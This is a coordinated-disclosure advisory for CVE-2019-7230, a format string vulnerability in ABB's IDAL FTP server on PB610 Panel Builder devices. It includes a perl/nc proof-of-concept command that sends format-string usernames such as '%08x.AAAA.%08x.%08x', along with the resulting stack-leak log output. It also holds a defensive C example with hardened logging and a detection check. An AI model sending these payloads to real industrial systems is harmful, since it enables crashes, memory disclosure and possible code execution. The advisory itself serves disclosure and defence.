ABB IDAL FTP Server Uncontrolled Format String Vulnerability

17 June 2019

IDENTIFIERS

CVE-2019-7230

ABBVU-IAMF-1902008

CVSS SCORE

8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

XID

XL-19-004

AFFECTED VENDORS

ABB (new.abb.com)

CREDIT

Eldar Marcussen - xen1thLabs - Software Labs

VULNERABILITY SUMMARY

The IDAL FTP server is vulnerable to memory corruption through insecure use of user-supplied format strings. An attacker can abuse this functionality to bypass authentication or execute code on the server.

TECHNICAL DETAILS

The IDAL FTP server does not safely handle username strings during the authentication process. Attempting to authenticate with the username “%s%p%x%d” will crash the server. Sending “%08x.AAAA.%08x.%08x” will log memory content from the stack.

PROOF OF CONCEPT

$ perl -e 'print "USER %08x.AAAA.%08x.%08x\r\nPASS xen1thLabs\r\n";' | nc targetip 22

UserManagementModule::isUserExist failed. “72657355.AAAA.616e614d.656d6567” not present in UserFactory

UserManagementModule::LoginFTPUser failed. User :“72657355.AAAA.616e614d.656d6567” not present in UserFactory

FTP logging stack values.
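As an added illustration (constructed for this write-up, not code from ABB or xen1thLabs), the C below shows the defensive side of the behaviour described in the technical details and proof of concept above: a failure-log call that passes the username as a %s argument to a fixed format string (with the vulnerable one-argument form noted in a comment), plus a small check that parses an FTP USER command and flags a '%' conversion directive in the username, which is the pattern a defender would alert on in FTP logs. The function names, the parser and the sample USER line are assumptions modelled on the log output shown above.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Constructed example (not the IDAL server's code): hardened logging plus a
   detection check for the format-string probe described in this advisory. */

/* Returns true if a username carries a '%' conversion directive, i.e. the
   byte pattern of the probes "%s%p%x%d" and "%08x.AAAA.%08x.%08x". */
bool username_has_format_directive(const char *user)
{
    return strchr(user, '%') != NULL;
}

/* Extracts the argument of an FTP "USER <name>\r\n" command into user_out.
   Returns 1 on success, 0 if the line is not a USER command or outsz is 0. */
int parse_ftp_user_command(const char *line, char *user_out, size_t outsz)
{
    if (outsz == 0 || strncmp(line, "USER ", 5) != 0)
        return 0;
    const char *p = line + 5;
    size_t n = strcspn(p, "\r\n");   /* stop at the CRLF line terminator */
    if (n >= outsz)
        n = outsz - 1;               /* truncate rather than overflow */
    memcpy(user_out, p, n);
    user_out[n] = '\0';
    return 1;
}

/* Hardened failure log: the username is a %s argument to a fixed format
   string, so "%08x" in the name is written out literally. The vulnerable
   pattern is the one-argument form snprintf(out, outsz, user), where the
   attacker-controlled user string itself becomes the format. */
int log_login_failure(char *out, size_t outsz, const char *user)
{
    return snprintf(out, outsz,
                    "UserManagementModule::LoginFTPUser failed. User :\"%s\" "
                    "not present in UserFactory", user);
}

int main(void)
{
    /* Constructed sample: the advisory's proof-of-concept USER line. */
    const char *line = "USER %08x.AAAA.%08x.%08x\r\n";
    char user[64], msg[256];
    if (parse_ftp_user_command(line, user, sizeof user)) {
        log_login_failure(msg, sizeof msg, user);
        printf("%s\n", msg);
        if (username_has_format_directive(user))
            printf("alert: format directive in FTP username\n");
    }
    return 0;
}
```

With the fixed format string the logged line contains the probe verbatim instead of stack words such as 72657355, and the '%' check gives a simple trigger for a detection rule on authentication failures.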

AFFECTED SYSTEMS

PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 … 2.8.0.367

SOLUTION

Apply the patches and instructions from the vendor:

- ABB PB610:

DISCLOSURE TIMELINE

04/02/2019 - Contacted ABB requesting disclosure coordination

05/02/2019 - Provided vulnerability details

05/06/2019 - Patch available

17/06/2019 - xen1thLabs public disclosure